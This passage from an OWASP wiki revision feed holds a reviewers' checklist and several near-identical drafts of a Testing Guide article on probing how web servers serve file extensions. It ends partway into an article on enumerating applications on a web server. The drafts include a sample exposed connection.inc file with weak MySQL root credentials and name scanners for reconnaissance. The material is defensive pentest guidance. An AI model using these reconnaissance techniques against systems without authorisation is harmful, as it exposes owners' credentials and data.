* '''Appendix A: Testing Tools --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it searching all the guide for paragraps: tools&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it searching all the guide for paragraps: tools&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola'''&lt;br /&gt;
1 article of 1: Need to be updated&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers  Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the english language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles on chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to talk about Gray Box Testing or other, so we can eliminate it.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like to have all the referenced URLs visible because I have to produce also a pdf document of the Guide).&lt;br /&gt;
I agree with Stefano, we have to use a reference like that:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check the reference with the other articles of the guide or with the other OWASP Project.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12558</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12558"/>
				<updated>2006-11-14T09:15:40Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used in web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester useful information about the underlying technologies used in a web appliance and greatly simplifies the task of determining the attack scenario to be used on peculiar technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this misconfiguration in web servers could easily reveal confidential information about access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be on a per web directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify directories which allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous can be the access to some kind of files. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To sum it up, in order to identify files having a given extensions, a mix of techniques can be employed, including: Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), querying search engines (see [[Spidering and googling AoC]]). See also [[Old file testing AoC]] which deals with the security issues related to &amp;quot;forgotten&amp;quot; files.&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extensions handling amounts at checking the configurations of web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto check for the existence of well-known web directories. They may allow as well to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se), or google for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12557</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12557"/>
				<updated>2006-11-14T09:12:42Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used in web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester useful information about the underlying technologies used in a web appliance and greatly simplifies the task of determining the attack scenario to be used on peculiar technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this misconfiguration in web servers could easily reveal confidential information about access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be on a per web directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify directories which allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous can be the access to some kind of files. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions. &amp;lt;br&amp;gt;&lt;br /&gt;
To sum it up, in order to identify files having a given extensions, a mix of techniques can be employed, including: Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), querying search engines (see [[Spidering and googling AoC]]). See also [[Old file testing AoC]] which deals with the security issues related to &amp;quot;forgotten&amp;quot; files.&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extensions handling amounts at checking the configurations of web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto check for the existence of well-known web directories. They may allow as well to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se), or google for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12556</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12556"/>
				<updated>2006-11-14T09:07:17Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used in web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester useful information about the underlying technologies used in a web appliance and greatly simplifies the task of determining the attack scenario to be used on peculiar technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this misconfiguration in web servers could easily reveal confidential information about access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be on a per web directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify directories which allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous can be the access to some kind of files. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions. &amp;lt;br&amp;gt;&lt;br /&gt;
To sum it up, in order to identify files having a given extensions, a mix of techniques can be employed, including: Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), querying search engines (see [[Spidering and googling AoC]]). See also [[Old file testing AoC]].&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extensions handling amounts at checking the configurations of web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto check for the existence of well-known web directories. They may allow as well to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se), or google for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12555</id>
		<title>Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_File_Extensions_Handling_for_Sensitive_Information_(OTG-CONFIG-003)&amp;diff=12555"/>
				<updated>2006-11-14T08:56:17Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
...To review and expand...&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
File extensions are commonly used in web servers to easily determine which technologies / languages / plugins must be used to fulfill the web request.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
While this behavior is consistent with RFCs and Web Standards, using standard file extensions provides the pentester useful information about the underlying technologies used in a web appliance and greatly simplifies the task of determining the attack scenario to be used on peculiar technologies.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this misconfiguration in web servers could easily reveal confidential information about access credentials.&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Determining how web servers handle requests corresponding to files having different extensions may help to understand web server behaviour depending on the kind of files we try to access. For example, it can help understand which file extensions are returned as text/plain versus those which cause execution on the server side. The latter are indicative of technologies / languages / plugins which are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support (though the file extension alone may be deceptive and not fully conclusive; for example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related). See also next section on “web server components” for more on identifying server side technologies and components.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Submit http[s] requests involving different file extensions and verify how they are handled. These verifications should be on a per web directory basis. &amp;lt;br&amp;gt;&lt;br /&gt;
Verify directories which allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows to reconstruct the tree of web directories served by the application. &amp;lt;br&amp;gt;&lt;br /&gt;
In case the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web / application servers; this may happen for example if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behaviour between themselves, and possibly different vulnerabilities). &amp;lt;br&amp;gt;&lt;br /&gt;
'''Example:'''&amp;lt;br&amp;gt;&lt;br /&gt;
We have identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
   	mysql_connect(&amp;quot;127.0.0.1&amp;quot;, &amp;quot;root&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        or die(&amp;quot;Could not connect&amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We determine the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. This example (which occurred in a real assessment) shows how dangerous can be the access to some kind of files. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The following file extensions should NEVER be returned by a web server, since they are related to files which may contain sensitive information, or to files for which there is no reason to be served. &amp;lt;br&amp;gt;&lt;br /&gt;
* .asa&lt;br /&gt;
* .inc&lt;br /&gt;
The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. &amp;lt;br&amp;gt;&lt;br /&gt;
* .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files&lt;br /&gt;
* .java: No reason to provide access to Java source files&lt;br /&gt;
* .txt: Text files&lt;br /&gt;
* .pdf: PDF documents&lt;br /&gt;
* .doc, .rtf, .xls, .ppt, ...: Office documents&lt;br /&gt;
* .bak and other extensions indicative of backup files (for example: ~ for Emacs backup files)&lt;br /&gt;
The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext.com/ for a more thorough database of extensions.&lt;br /&gt;
&lt;br /&gt;
==Gray Box testing and example==&lt;br /&gt;
&lt;br /&gt;
Performing white box testing against file extensions handling amounts at checking the configurations of web server(s) / application server(s) taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.&lt;br /&gt;
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behaviour.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerability scanners, such as Nessus and Nikto check for the existence of well-known web directories. They may allow as well to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include wget (http://www.gnu.org/software/wget/) and curl (http://curl.haxx.se), or google for “web mirroring tools”.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12426</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12426"/>
				<updated>2006-11-13T08:12:37Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
